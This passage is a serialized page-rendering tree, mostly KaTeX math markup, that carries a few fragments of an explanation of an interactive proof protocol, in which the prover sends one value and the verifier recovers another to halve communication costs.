tag":301,"props":117308,"children":117310},{"className":117309,"style":11012},[10914],[],{"type":24,"tag":301,"props":117312,"children":117314},{"className":117313},[11017],[117315],{"type":30,"value":523},{"type":24,"tag":301,"props":117317,"children":117319},{"className":117318,"style":11012},[10914],[],{"type":24,"tag":301,"props":117321,"children":117323},{"className":117322},[10824],[117324,117328,117399,117403,117407,117413,117417],{"type":24,"tag":301,"props":117325,"children":117327},{"className":117326,"style":117140},[10829],[],{"type":24,"tag":301,"props":117329,"children":117331},{"className":117330},[10835],[117332,117337],{"type":24,"tag":301,"props":117333,"children":117335},{"className":117334,"style":99979},[10835,28357],[117336],{"type":30,"value":99982},{"type":24,"tag":301,"props":117338,"children":117340},{"className":117339},[10850],[117341],{"type":24,"tag":301,"props":117342,"children":117344},{"className":117343},[10855,28411],[117345,117388],{"type":24,"tag":301,"props":117346,"children":117348},{"className":117347},[10860],[117349,117383],{"type":24,"tag":301,"props":117350,"children":117352},{"className":117351,"style":100273},[10865],[117353],{"type":24,"tag":301,"props":117354,"children":117355},{"style":117169},[117356,117360],{"type":24,"tag":301,"props":117357,"children":117359},{"className":117358,"style":10875},[10874],[],{"type":24,"tag":301,"props":117361,"children":117363},{"className":117362},[10880,10881,10882,10883],[117364],{"type":24,"tag":301,"props":117365,"children":117367},{"className":117366},[10835,10883],[117368,117373,117378],{"type":24,"tag":301,"props":117369,"children":117371},{"className":117370},[10835,28357,10883],[117372],{"type":30,"value":10564},{"type":24,"tag":301,"props":117374,"children":117376},{"className":117375},[10920,10883],[117377],{"type":30,"value":10894},{"type":24,"tag":301,"props":117379,"children":117381},{"className":117380},[10835,10883],[117382],{"type":30,"value":546},{"type":24,"tag":301,"props":117384,"children":117386},{"className":117385},[28514],[117387],{"type":30,"value":28517},{"type":24,"tag":301,"props":117389,"children":117391},{"className":117390},[10860],[117392],{"type":24,"tag":301,"props":117393,"children":117395},{"className":117394,"style":117210},[10865],[117396],{"type":24,"tag":301,"props":117397,"children":117398},{},[],{"type":24,"tag":301,"props":117400,"children":117402},{"className":117401,"style":11012},[10914],[],{"type":24,"tag":301,"props":117404,"children":117406},{"className":117405,"style":11012},[10914],[],{"type":24,"tag":301,"props":117408,"children":117410},{"className":117409},[11017],[117411],{"type":30,"value":117412},"⟹",{"type":24,"tag":301,"props":117414,"children":117416},{"className":117415,"style":11012},[10914],[],{"type":24,"tag":301,"props":117418,"children":117420},{"className":117419,"style":11012},[10914],[],{"type":24,"tag":301,"props":117422,"children":117424},{"className":117423},[10824],[117425,117429,117434,117438,117443],{"type":24,"tag":301,"props":117426,"children":117428},{"className":117427,"style":99660},[10829],[],{"type":24,"tag":301,"props":117430,"children":117432},{"className":117431},[10835,28357],[117433],{"type":30,"value":5613},{"type":24,"tag":301,"props":117435,"children":117437},{"className":117436,"style":11012},[10914],[],{"type":24,"tag":301,"props":117439,"children":117441},{"className":117440},[11017],[117442],{"type":30,"value":523},{"type":24,"tag":301,"props":117444,"children":117446},{"className":117445,"style":11012},[10914],[],{"type":24,"tag":301,"props":117448,"children":117450},{"className":117449},[10824],[117451,117455,117526,117530,117535],{"type":24,"tag":301,"props":117452,"children":117454},{"className":117453,"style":117140},[10829],[],{"type":24,"tag":301,"props":117456,"children":117458},{"className":117457},[10835],[117459,117464],{"type":24,"tag":301,"props":117460,"children":117462},{"className":117461,"style":99979},[10835,28357],[117463],{"type":30,"value":99982},{"type":24,"tag":301,"props":117465,"children":117467},{"className":117466},[10850],[117468],{"type":24,"tag":301,"props":117469,"children":117471},{"className":117470},[10855,28411],[117472,117515],{"type":24,"tag":301,"props":117473,"children":117475},{"className":117474},[10860],[117476,117510],{"type":24,"tag":301,"props":117477,"children":117479},{"className":117478,"style":100273},[10865],[117480],{"type":24,"tag":301,"props":117481,"children":117482},{"style":117169},[117483,117487],{"type":24,"tag":301,"props":117484,"children":117486},{"className":117485,"style":10875},[10874],[],{"type":24,"tag":301,"props":117488,"children":117490},{"className":117489},[10880,10881,10882,10883],[117491],{"type":24,"tag":301,"props":117492,"children":117494},{"className":117493},[10835,10883],[117495,117500,117505],{"type":24,"tag":301,"props":117496,"children":117498},{"className":117497},[10835,28357,10883],[117499],{"type":30,"value":10564},{"type":24,"tag":301,"props":117501,"children":117503},{"className":117502},[10920,10883],[117504],{"type":30,"value":10894},{"type":24,"tag":301,"props":117506,"children":117508},{"className":117507},[10835,10883],[117509],{"type":30,"value":546},{"type":24,"tag":301,"props":117511,"children":117513},{"className":117512},[28514],[117514],{"type":30,"value":28517},{"type":24,"tag":301,"props":117516,"children":117518},{"className":117517},[10860],[117519],{"type":24,"tag":301,"props":117520,"children":117522},{"className":117521,"style":117210},[10865],[117523],{"type":24,"tag":301,"props":117524,"children":117525},{},[],{"type":24,"tag":301,"props":117527,"children":117529},{"className":117528,"style":10915},[10914],[],{"type":24,"tag":301,"props":117531,"children":117533},{"className":117532},[10920],[117534],{"type":30,"value":10894},{"type":24,"tag":301,"props":117536,"children":117538},{"className":117537,"style":10915},[10914],[],{"type":24,"tag":301,"props":117540,"children":117542},{"className":117541},[10824],[117543,117547,117552],{"type":24,"tag":301,"props":117544,"children":117546},{"className":117545,"style":100775},[10829],[],{"type":24,"tag":301,"props":117548,"children":117550},{"className":117549},[10835],[117551],{"type":30,"value":1503},{"type":24,"tag":301,"props":117553,"children":117555},{"className":117554},[10835,28357],[117556],{"type":30,"value":188},{"type":24,"tag":32,"props":117558,"children":117559},{},[117560,117562,117681,117683,117708],{"type":30,"value":117561},"So the prover only sends ",{"type":24,"tag":145,"props":117563,"children":117565},{"className":117564},[10807,10808],[117566],{"type":24,"tag":301,"props":117567,"children":117569},{"className":117568},[10813],[117570],{"type":24,"tag":301,"props":117571,"children":117573},{"className":117572,"ariaHidden":10819},[10818],[117574,117601],{"type":24,"tag":301,"props":117575,"children":117577},{"className":117576},[10824],[117578,117583,117588,117592,117597],{"type":24,"tag":301,"props":117579,"children":117582},{"className":117580,"style":117581},[10829],"height:0.4306em;",[],{"type":24,"tag":301,"props":117584,"children":117586},{"className":117585},[10835,28357],[117587],{"type":30,"value":188},{"type":24,"tag":301,"props":117589,"children":117591},{"className":117590,"style":11012},[10914],[],{"type":24,"tag":301,"props":117593,"children":117595},{"className":117594},[11017],[117596],{"type":30,"value":523},{"type":24,"tag":301,"props":117598,"children":117600},{"className":117599,"style":11012},[10914],[],{"type":24,"tag":301,"props":117602,"children":117604},{"className":117603},[10824],[117605,117609,117666,117671,117676],{"type":24,"tag":301,"props":117606,"children":117608},{"className":117607,"style":10935},[10829],[],{"type":24,"tag":301,"props":117610,"children":117612},{"className":117611},[10835],[117613,117618],{"type":24,"tag":301,"props":117614,"children":117616},{"className":117615,"style":100230},[10835,28357],[117617],{"type":30,"value":777},{"type":24,"tag":301,"props":117619,"children":117621},{"className":117620},[10850],[117622],{"type":24,"tag":301,"props":117623,"children":117625},{"className":117624},[10855,28411],[117626,117655],{"type":24,"tag":301,"props":117627,"children":117629},{"className":117628},[10860],[117630,117650],{"type":24,"tag":301,"props":117631,"children":117633},{"className":117632,"style":100273},[10865],[117634],{"type":24,"tag":301,"props":117635,"children":117636},{"style":100277},[117637,117641],{"type":24,"tag":301,"props":117638,"children":117640},{"className":117639,"style":10875},[10874],[],{"type":24,"tag":301,"props":117642,"children":117644},{"className":117643},[10880,10881,10882,10883],[117645],{"type":24,"tag":301,"props":117646,"children":117648},{"className":117647},[10835,28357,10883],[117649],{"type":30,"value":10564},{"type":24,"tag":301,"props":117651,"children":117653},{"className":117652},[28514],[117654],{"type":30,"value":28517},{"type":24,"tag":301,"props":117656,"children":117658},{"className":117657},[10860],[117659],{"type":24,"tag":301,"props":117660,"children":117662},{"className":117661,"style":99828},[10865],[117663],{"type":24,"tag":301,"props":117664,"children":117665},{},[],{"type":24,"tag":301,"props":117667,"children":117669},{"className":117668},[28486],[117670],{"type":30,"value":362},{"type":24,"tag":301,"props":117672,"children":117674},{"className":117673},[10835],[117675],{"type":30,"value":584},{"type":24,"tag":301,"props":117677,"children":117679},{"className":117678},[28508],[117680],{"type":30,"value":9961},{"type":30,"value":117682},", and the verifier recovers ",{"type":24,"tag":145,"props":117684,"children":117686},{"className":117685},[10807,10808],[117687],{"type":24,"tag":301,"props":117688,"children":117690},{"className":117689},[10813],[117691],{"type":24,"tag":301,"props":117692,"children":117694},{"className":117693,"ariaHidden":10819},[10818],[117695],{"type":24,"tag":301,"props":117696,"children":117698},{"className":117697},[10824],[117699,117703],{"type":24,"tag":301,"props":117700,"children":117702},{"className":117701,"style":99660},[10829],[],{"type":24,"tag":301,"props":117704,"children":117706},{"className":117705},[10835,28357],[117707],{"type":30,"value":5613},{"type":30,"value":117709},". This saves 50% on communication costs.",{"type":24,"tag":32,"props":117711,"children":117712},{},[117713],{"type":30,"value":117714},"The next claim in the chain is",{"type":24,"tag":32,"props":117716,"children":117717},{},[117718],{"type":24,"tag":145,"props":117719,"children":117721},{"className":117720},[10807,10808],[117722],{"type":24,"tag":301,"props":117723,"children":117725},{"className":117724},[10813],[117726],{"type":24,"tag":301,"props":117727,"children":117729},{"className":117728,"ariaHidden":10819},[10818],[117730,117809,117954,117980,118007,118085,118111,118208,118244,118322,118358,118446,118538],{"type":24,"tag":301,"props":117731,"children":117733},{"className":117732},[10824],[117734,117739,117796,117800,117805],{"type":24,"tag":301,"props":117735,"children":117738},{"className":117736,"style":117737},[10829],"height:0.8333em;vertical-align:-0.15em;",[],{"type":24,"tag":301,"props":117740,"children":117742},{"className":117741},[10835],[117743,117748],{"type":24,"tag":301,"props":117744,"children":117746},{"className":117745,"style":99979},[10835,28357],[117747],{"type":30,"value":99982},{"type":24,"tag":301,"props":117749,"children":117751},{"className":117750},[10850],[117752],{"type":24,"tag":301,"props":117753,"children":117755},{"className":117754},[10855,28411],[117756,117785],{"type":24,"tag":301,"props":117757,"children":117759},{"className":117758},[10860],[117760,117780],{"type":24,"tag":301,"props":117761,"children":117763},{"className":117762,"style":100273},[10865],[117764],{"type":24,"tag":301,"props":117765,"children":117766},{"style":117169},[117767,117771],{"type":24,"tag":301,"props":117768,"children":117770},{"className":117769,"style":10875},[10874],[],{"type":24,"tag":301,"props":117772,"children":117774},{"className":117773},[10880,10881,10882,10883],[117775],{"type":24,"tag":301,"props":117776,"children":117778},{"className":117777},[10835,28357,10883],[117779],{"type":30,"value":10564},{"type":24,"tag":301,"props":117781,"children":117783},{"className":117782},[28514],[117784],{"type":30,"value":28517},{"type":24,"tag":301,"props":117786,"children":117788},{"className":117787},[10860],[117789],{"type":24,"tag":301,"props":117790,"children":117792},{"className":117791,"style":99828},[10865],[117793],{"type":24,"tag":301,"props":117794,"children":117795},{},[],{"type":24,"tag":301,"props":117797,"children":117799},{"className":117798,"style":11012},[10914],[],{"type":24,"tag":301,"props":117801,"children":117803},{"className":117802},[11017],[117804],{"type":30,"value":523},{"type":24,"tag":301,"props":117806,"children":117808},{"className":117807,"style":11012},[10914],[],{"type":24,"tag":301,"props":117810,"children":117812},{"className":117811},[10824],[117813,117817,117874,117879,117936,117941,117945,117950],{"type":24,"tag":301,"props":117814,"children":117816},{"className":117815,"style":10935},[10829],[],{"type":24,"tag":301,"props":117818,"children":117820},{"className":117819},[10835],[117821,117826],{"type":24,"tag":301,"props":117822,"children":117824},{"className":117823,"style":100230},[10835,28357],[117825],{"type":30,"value":777},{"type":24,"tag":301,"props":117827,"children":117829},{"className":117828},[10850],[117830],{"type":24,"tag":301,"props":117831,"children":117833},{"className":117832},[10855,28411],[117834,117863],{"type":24,"tag":301,"props":117835,"children":117837},{"className":117836},[10860],[117838,117858],{"type":24,"tag":301,"props":117839,"children":117841},{"className":117840,"style":100273},[10865],[117842],{"type":24,"tag":301,"props":117843,"children":117844},{"style":100277},[117845,117849],{"type":24,"tag":301,"props":117846,"children":117848},{"className":117847,"style":10875},[10874],[],{"type":24,"tag":301,"props":117850,"children":117852},{"className":117851},[10880,10881,10882,10883],[117853],{"type":24,"tag":301,"props":117854,"children":117856},{"className":117855},[10835,28357,10883],[117857],{"type":30,"value":10564},{"type":24,"tag":301,"props":117859,"children":117861},{"className":117860},[28514],[117862],{"type":30,"value":28517},{"type":24,"tag":301,"props":117864,"children":117866},{"className":117865},[10860],[117867],{"type":24,"tag":301,"props":117868,"children":117870},{"className":117869,"style":99828},[10865],[117871],{"type":24,"tag":301,"props":117872,"children":117873},{},[],{"type":24,"tag":301,"props":117875,"children":117877},{"className":117876},[28486],[117878],{"type":30,"value":362},{"type":24,"tag":301,"props":117880,"children":117882},{"className":117881},[10835],[117883,117888],{"type":24,"tag":301,"props":117884,"children":117886},{"className":117885,"style":99745},[10835,28357],[117887],{"type":30,"value":100563},{"type":24,"tag":301,"props":117889,"children":117891},{"className":117890},[10850],[117892],{"type":24,"tag":301,"props":117893,"children":117895},{"className":117894},[10855,28411],[117896,117925],{"type":24,"tag":301,"props":117897,"children":117899},{"className":117898},[10860],[117900,117920],{"type":24,"tag":301,"props":117901,"children":117903},{"className":117902,"style":100273},[10865],[117904],{"type":24,"tag":301,"props":117905,"children":117906},{"style":116739},[117907,117911],{"type":24,"tag":301,"props":117908,"children":117910},{"className":117909,"style":10875},[10874],[],{"type":24,"tag":301,"props":117912,"children":117914},{"className":117913},[10880,10881,10882,10883],[117915],{"type":24,"tag":301,"props":117916,"children":117918},{"className":117917},[10835,28357,10883],[117919],{"type":30,"value":10564},{"type":24,"tag":301,"props":117921,"children":117923},{"className":117922},[28514],[117924],{"type":30,"value":28517},{"type":24,"tag":301,"props":117926,"children":117928},{"className":117927},[10860],[117929],{"type":24,"tag":301,"props":117930,"children":117932},{"className":117931,"style":99828},[10865],[117933],{"type":24,"tag":301,"props":117934,"children":117935},{},[],{"type":24,"tag":301,"props":117937,"children":117939},{"className":117938},[28508],[117940],{"type":30,"value":9961},{"type":24,"tag":301,"props":117942,"children":117944},{"className":117943,"style":11012},[10914],[],{"type":24,"tag":301,"props":117946,"children":117948},{"className":117947},[11017],[117949],{"type":30,"value":523},{"type":24,"tag":301,"props":117951,"children":117953},{"className":117952,"style":11012},[10914],[],{"type":24,"tag":301,"props":117955,"children":117957},{"className":117956},[10824],[117958,117962,117967,117971,117976],{"type":24,"tag":301,"props":117959,"children":117961},{"className":117960,"style":116895},[10829],[],{"type":24,"tag":301,"props":117963,"children":117965},{"className":117964},[10835,28357],[117966],{"type":30,"value":188},{"type":24,"tag":301,"props":117968,"children":117970},{"className":117969,"style":10915},[10914],[],{"type":24,"tag":301,"props":117972,"children":117974},{"className":117973},[10920],[117975],{"type":30,"value":11206},{"type":24,"tag":301,"props":117977,"children":117979},{"className":117978,"style":10915},[10914],[],{"type":24,"tag":301,"props":117981,"children":117983},{"className":117982},[10824],[117984,117988,117993,117997,118003],{"type":24,"tag":301,"props":117985,"children":117987},{"className":117986,"style":99660},[10829],[],{"type":24,"tag":301,"props":117989,"children":117991},{"className":117990},[10835,28357],[117992],{"type":30,"value":5613},{"type":24,"tag":301,"props":117994,"children":117996},{"className":117995,"style":10915},[10914],[],{"type":24,"tag":301,"props":117998,"children":118000},{"className":117999},[10920],[118001],{"type":30,"value":118002},"⋅",{"type":24,"tag":301,"props":118004,"children":118006},{"className":118005,"style":10915},[10914],[],{"type":24,"tag":301,"props":118008,"children":118010},{"className":118009},[10824],[118011,118015,118072,118076,118081],{"type":24,"tag":301,"props":118012,"children":118014},{"className":118013,"style":116710},[10829],[],{"type":24,"tag":301,"props":118016,"children":118018},{"className":118017},[10835],[118019,118024],{"type":24,"tag":301,"props":118020,"children":118022},{"className":118021,"style":99745},[10835,28357],[118023],{"type":30,"value":100563},{"type":24,"tag":301,"props":118025,"children":118027},{"className":118026},[10850],[118028],{"type":24,"tag":301,"props":118029,"children":118031},{"className":118030},[10855,28411],[118032,118061],{"type":24,"tag":301,"props":118033,"children":118035},{"className":118034},[10860],[118036,118056],{"type":24,"tag":301,"props":118037,"children":118039},{"className":118038,"style":100273},[10865],[118040],{"type":24,"tag":301,"props":118041,"children":118042},{"style":116739},[118043,118047],{"type":24,"tag":301,"props":118044,"children":118046},{"className":118045,"style":10875},[10874],[],{"type":24,"tag":301,"props":118048,"children":118050},{"className":118049},[10880,10881,10882,10883],[118051],{"type":24,"tag":301,"props":118052,"children":118054},{"className":118053},[10835,28357,10883],[118055],{"type":30,"value":10564},{"type":24,"tag":301,"props":118057,"children":118059},{"className":118058},[28514],[118060],{"type":30,"value":28517},{"type":24,"tag":301,"props":118062,"children":118064},{"className":118063},[10860],[118065],{"type":24,"tag":301,"props":118066,"children":118068},{"className":118067,"style":99828},[10865],[118069],{"type":24,"tag":301,"props":118070,"children":118071},{},[],{"type":24,"tag":301,"props":118073,"children":118075},{"className":118074,"style":11012},[10914],[],{"type":24,"tag":301,"props":118077,"children":118079},{"className":118078},[11017],[118080],{"type":30,"value":523},{"type":24,"tag":301,"props":118082,"children":118084},{"className":118083,"style":11012},[10914],[],{"type":24,"tag":301,"props":118086,"children":118088},{"className":118087},[10824],[118089,118093,118098,118102,118107],{"type":24,"tag":301,"props":118090,"children":118092},{"className":118091,"style":116895},[10829],[],{"type":24,"tag":301,"props":118094,"children":118096},{"className":118095},[10835,28357],[118097],{"type":30,"value":188},{"type":24,"tag":301,"props":118099,"children":118101},{"className":118100,"style":10915},[10914],[],{"type":24,"tag":301,"props":118103,"children":118105},{"className":118104},[10920],[118106],{"type":30,"value":11206},{"type":24,"tag":301,"props":118108,"children":118110},{"className":118109,"style":10915},[10914],[],{"type":24,"tag":301,"props":118112,"children":118114},{"className":118113},[10824],[118115,118119,118124,118195,118199,118204],{"type":24,"tag":301,"props":118116,"children":118118},{"className":118117,"style":10935},[10829],[],{"type":24,"tag":301,"props":118120,"children":118122},{"className":118121},[28486],[118123],{"type":30,"value":362},{"type":24,"tag":301,"props":118125,"children":118127},{"className":118126},[10835],[118128,118133],{"type":24,"tag":301,"props":118129,"children":118131},{"className":118130,"style":99979},[10835,28357],[118132],{"type":30,"value":99982},{"type":24,"tag":301,"props":118134,"children":118136},{"className":118135},[10850],[118137],{"type":24,"tag":301,"props":118138,"children":118140},{"className":118139},[10855,28411],[118141,118184],{"type":24,"tag":301,"props":118142,"children":118144},{"className":118143},[10860],[118145,118179],{"type":24,"tag":301,"props":118146,"children":118148},{"className":118147,"style":100273},[10865],[118149],{"type":24,"tag":301,"props":118150,"children":118151},{"style":117169},[118152,118156],{"type":24,"tag":301,"props":118153,"children":118155},{"className":118154,"style":10875},[10874],[],{"type":24,"tag":301,"props":118157,"children":118159},{"className":118158},[10880,10881,10882,10883],[118160],{"type":24,"tag":301,"props":118161,"children":118163},{"className":118162},[10835,10883],[118164,118169,118174],{"type":24,"tag":301,"props":118165,"children":118167},{"className":118166},[10835,28357,10883],[118168],{"type":30,"value":10564},{"type":24,"tag":301,"props":118170,"children":118172},{"className":118171},[10920,10883],[118173],{"type":30,"value":10894},{"type":24,"tag":301,"props":118175,"children":118177},{"className":118176},[10835,10883],[118178],{"type":30,"value":546},{"type":24,"tag":301,"props":118180,"children":118182},{"className":118181},[28514],[118183],{"type":30,"value":28517},{"type":24,"tag":301,"props":118185,"children":118187},{"className":118186},[10860],[118188],{"type":24,"tag":301,"props":118189,"children":118191},{"className":118190,"style":117210},[10865],[118192],{"type":24,"tag":301,"props":118193,"children":118194},{},[],{"type":24,"tag":301,"props":118196,"children":118198},{"className":118197,"style":10915},[10914],[],{"type":24,"tag":301,"props":118200,"children":118202},{"className":118201},[10920],[118203],{"type":30,"value":10894},{"type":24,"tag":301,"props":118205,"children":118207},{"className":118206,"style":10915},[10914],[],{"type":24,"tag":301,"props":118209,"children":118211},{"className":118210},[10824],[118212,118216,118221,118226,118231,118235,118240],{"type":24,"tag":301,"props":118213,"children":118215},{"className":118214,"style":10935},[10829],[],{"type":24,"tag":301,"props":118217,"children":118219},{"className":118218},[10835],[118220],{"type":30,"value":1503},{"type":24,"tag":301,"props":118222,"children":118224},{"className":118223},[10835,28357],[118225],{"type":30,"value":188},{"type":24,"tag":301,"props":118227,"children":118229},{"className":118228},[28508],[118230],{"type":30,"value":9961},{"type":24,"tag":301,"props":118232,"children":118234},{"className":118233,"style":10915},[10914],[],{"type":24,"tag":301,"props":118236,"children":118238},{"className":118237},[10920],[118239],{"type":30,"value":118002},{"type":24,"tag":301,"props":118241,"children":118243},{"className":118242,"style":10915},[10914],[],{"type":24,"tag":301,"props":118245,"children":118247},{"className":118246},[10824],[118248,118252,118309,118313,118318],{"type":24,"tag":301,"props":118249,"children":118251},{"className":118250,"style":116710},[10829],[],{"type":24,"tag":301,"props":118253,"children":118255},{"className":118254},[10835],[118256,118261],{"type":24,"tag":301,"props":118257,"children":118259},{"className":118258,"style":99745},[10835,28357],[118260],{"type":30,"value":100563},{"type":24,"tag":301,"props":118262,"children":118264},{"className":118263},[10850],[118265],{"type":24,"tag":301,"props":118266,"children":118268},{"className":118267},[10855,28411],[118269,118298],{"type":24,"tag":301,"props":118270,"children":118272},{"className":118271},[10860],[118273,118293],{"type":24,"tag":301,"props":118274,"children":118276},{"className":118275,"style":100273},[10865],[118277],{"type":24,"tag":301,"props":118278,"children":118279},{"style":116739},[118280,118284],{"type":24,"tag":301,"props":118281,"children":118283},{"className":118282,"style":10875},[10874],[],{"type":24,"tag":301,"props":118285,"children":118287},{"className":118286},[10880,10881,10882,10883],[118288],{"type":24,"tag":301,"props":118289,"children":118291},{"className":118290},[10835,28357,10883],[118292],{"type":30,"value":10564},{"type":24,"tag":301,"props":118294,"children":118296},{"className":118295},[28514],[118297],{"type":30,"value":28517},{"type":24,"tag":301,"props":118299,"children":118301},{"className":118300},[10860],[118302],{"type":24,"tag":301,"props":118303,"children":118305},{"className":118304,"style":99828},[10865],[118306],{"type":24,"tag":301,"props":118307,"children":118308},{},[],{"type":24,"tag":301,"props":118310,"children":118312},{"className":118311,"style":11012},[10914],[],{"type":24,"tag":301,"props":118314,"children":118316},{"className":118315},[11017],[118317],{"type":30,"value":523},{"type":24,"tag":301,"props":118319,"children":118321},{"className":118320,"style":11012},[10914],[],{"type":24,"tag":301,"props":118323,"children":118325},{"className":118324},[10824],[118326,118330,118335,118340,118345,118349,118354],{"type":24,"tag":301,"props":118327,"children":118329},{"className":118328,"style":10935},[10829],[],{"type":24,"tag":301,"props":118331,"children":118333},{"className":118332},[10835,28357],[118334],{"type":30,"value":188},{"type":24,"tag":301,"props":118336,"children":118338},{"className":118337},[28486],[118339],{"type":30,"value":362},{"type":24,"tag":301,"props":118341,"children":118343},{"className":118342},[10835],[118344],{"type":30,"value":546},{"type":24,"tag":301,"props":118346,"children":118348},{"className":118347,"style":10915},[10914],[],{"type":24,"tag":301,"props":118350,"children":118352},{"className":118351},[10920],[118353],{"type":30,"value":10894},{"type":24,"tag":301,"props":118355,"children":118357},{"className":118356,"style":10915},[10914],[],{"type":24,"tag":301,"props":118359,"children":118361},{"className":118360},[10824],[118362,118366,118371,118428,118433,118437,118442],{"type":24,"tag":301,"props":118363,"children":118365},{"className":118364,"style":10935},[10829],[],{"type":24,"tag":301,"props":118367,"children":118369},{"className":118368},[10835],[118370],{"type":30,"value":1503},{"type":24,"tag":301,"props":118372,"children":118374},{"className":118373},[10835],[118375,118380],{"type":24,"tag":301,"props":118376,"children":118378},{"className":118377,"style":99745},[10835,28357],[118379],{"type":30,"value":100563},{"type":24,"tag":301,"props":118381,"children":118383},{"className":118382},[10850],[118384],{"type":24,"tag":301,"props":118385,"children":118387},{"className":118386},[10855,28411],[118388,118417],{"type":24,"tag":301,"props":118389,"children":118391},{"className":118390},[10860],[118392,118412],{"type":24,"tag":301,"props":118393,"children":118395},{"className":118394,"style":100273},[10865],[118396],{"type":24,"tag":301,"props":118397,"children":118398},{"style":116739},[118399,118403],{"type":24,"tag":301,"props":118400,"children":118402},{"className":118401,"style":10875},[10874],[],{"type":24,"tag":301,"props":118404,"children":118406},{"className":118405},[10880,10881,10882,10883],[118407],{"type":24,"tag":301,"props":118408,"children":118410},{"className":118409},[10835,28357,10883],[118411],{"type":30,"value":10564},{"type":24,"tag":301,"props":118413,"children":118415},{"className":118414},[28514],[118416],{"type":30,"value":28517},{"type":24,"tag":301,"props":118418,"children":118420},{"className":118419},[10860],[118421],{"type":24,"tag":301,"props":118422,"children":118424},{"className":118423,"style":99828},[10865],[118425],{"type":24,"tag":301,"props":118426,"children":118427},{},[],{"type":24,"tag":301,"props":118429,"children":118431},{"className":118430},[28508],[118432],{"type":30,"value":9961},{"type":24,"tag":301,"props":118434,"children":118436},{"className":118435,"style":10915},[10914],[],{"type":24,"tag":301,"props":118438,"children":118440},{"className":118439},[10920],[118441],{"type":30,"value":11206},{"type":24,"tag":301,"props":118443,"children":118445},{"className":118444,"style":10915},[10914],[],{"type":24,"tag":301,"props":118447,"children":118449},{"className":118448},[10824],[118450,118454,118525,118529,118534],{"type":24,"tag":301,"props":118451,"children":118453},{"className":118452,"style":117140},[10829],[],{"type":24,"tag":301,"props":118455,"children":118457},{"className":118456},[10835],[118458,118463],{"type":24,"tag":301,"props":118459,"children":118461},{"className":118460,"style":99979},[10835,28357],[118462],{"type":30,"value":99982},{"type":24,"tag":301,"props":118464,"children":118466},{"className":118465},[10850],[118467],{"type":24,"tag":301,"props":118468,"children":118470},{"className":118469},[10855,28411],[118471,118514],{"type":24,"tag":301,"props":118472,"children":118474},{"className":118473},[10860],[118475,118509],{"type":24,"tag":301,"props":118476,"children":118478},{"className":118477,"style":100273},[10865],[118479],{"type":24,"tag":301,"props":118480,"children":118481},{"style":117169},[118482,118486],{"type":24,"tag":301,"props":118483,"children":118485},{"className":118484,"style":10875},[10874],[],{"type":24,"tag":301,"props":118487,"children":118489},{"className":118488},[10880,10881,10882,10883],[118490],{"type":24,"tag":301,"props":118491,"children":118493},{"className":118492},[10835,10883],[118494,118499,118504],{"type":24,"tag":301,"props":118495,"children":118497},{"className":118496},[10835,28357,10883],[118498],{"type":30,"value":10564},{"type":24,"tag":301,"props":118500,"children":118502},{"className":118501},[10920,10883],[118503],{"type":30,"value":10894},{"type":24,"tag":301,"props":118505,"children":118507},{"className":118506},[10835,10883],[118508],{"type":30,"value":546},{"type":24,"tag":301,"props":118510,"children":118512},{"className":118511},[28514],[118513],{"type":30,"value":28517},{"type":24,"tag":301,"props":118515,"children":118517},{"className":118516},[10860],[118518],{"type":24,"tag":301,"props":118519,"children":118521},{"className":118520,"style":117210},[10865],[118522],{"type":24,"tag":301,"props":118523,"children":118524},{},[],{"type":24,"tag":301,"props":118526,"children":118528},{"className":118527,"style":10915},[10914],[],{"type":24,"tag":301,"props":118530,"children":118532},{"className":118531},[10920],[118533],{"type":30,"value":118002},{"type":24,"tag":301,"props":118535,"children":118537},{"className":118536,"style":10915},[10914],[],{"type":24,"tag":301,"props":118539,"children":118541},{"className":118540},[10824],[118542,118546],{"type":24,"tag":301,"props":118543,"children":118545},{"className":118544,"style":116710},[10829],[],{"type":24,"tag":301,"props":118547,"children":118549},{"className":118548},[10835],[118550,118555],{"type":24,"tag":301,"props":118551,"children":118553},{"className":118552,"style":99745},[10835,28357],[118554],{"type":30,"value":100563},{"type":24,"tag":301,"props":118556,"children":118558},{"className":118557},[10850],[118559],{"type":24,"tag":301,"props":118560,"children":118562},{"className":118561},[10855,28411],[118563,118592],{"type":24,"tag":301,"props":118564,"children":118566},{"className":118565},[10860],[118567,118587],{"type":24,"tag":301,"props":118568,"children":118570},{"className":118569,"style":100273},[10865],[118571],{"type":24,"tag":301,"props":118572,"children":118573},{"style":116739},[118574,118578],{"type":24,"tag":301,"props":118575,"children":118577},{"className":118576,"style":10875},[10874],[],{"type":24,"tag":301,"props":118579,"children":118581},{"className":118580},[10880,10881,10882,10883],[118582],{"type":24,"tag":301,"props":118583,"children":118585},{"className":118584},[10835,28357,10883],[118586],{"type":30,"value":10564},{"type":24,"tag":301,"props":118588,"children":118590},{"className":118589},[28514],[118591],{"type":30,"value":28517},{"type":24,"tag":301,"props":118593,"children":118595},{"className":118594},[10860],[118596],{"type":24,"tag":301,"props":118597,"children":118599},{"className":118598,"style":99828},[10865],[118600],{"type":24,"tag":301,"props":118601,"children":118602},{},[],{"type":24,"tag":32,"props":118604,"children":118605},{},[118606,118607,118703,118705,118730,118732,118757],{"type":30,"value":52872},{"type":24,"tag":60,"props":118608,"children":118609},{},[118610,118612],{"type":30,"value":118611},"linear in ",{"type":24,"tag":145,"props":118613,"children":118615},{"className":118614},[10807,10808],[118616],{"type":24,"tag":301,"props":118617,"children":118619},{"className":118618},[10813],[118620],{"type":24,"tag":301,"props":118621,"children":118623},{"className":118622,"ariaHidden":10819},[10818],[118624],{"type":24,"tag":301,"props":118625,"children":118627},{"className":118626},[10824],[118628,118632],{"type":24,"tag":301,"props":118629,"children":118631},{"className":118630,"style":117140},[10829],[],{"type":24,"tag":301,"props":118633,"children":118635},{"className":118634},[10835],[118636,118641],{"type":24,"tag":301,"props":118637,"children":118639},{"className":118638,"style":99979},[10835,28357],[118640],{"type":30,"value":99982},{"type":24,"tag":301,"props":118642,"children":118644},{"className":118643},[10850],[118645],{"type":24,"tag":301,"props":118646,"children":118648},{"className":118647},[10855,28411],[118649,118692],{"type":24,"tag":301,"props":118650,"children":118652},{"className":118651},[10860],[118653,118687],{"type":24,"tag":301,"props":118654,"children":118656},{"className":118655,"style":100273},[10865],[118657],{"type":24,"tag":301,"props":118658,"children":118659},{"style":117169},[118660,118664],{"type":24,"tag":301,"props":118661,"children":118663},{"className":118662,"style":10875},[10874],[],{"type":24,"tag":301,"props":118665,"children":118667},{"className":118666},[10880,10881,10882,10883],[118668],{"type":24,"tag":301,"props":118669,"children":118671},{"className":118670},[10835,10883],[118672,118677,118682],{"type":24,"tag":301,"props":118673,"children":118675},{"className":118674},[10835,28357,10883]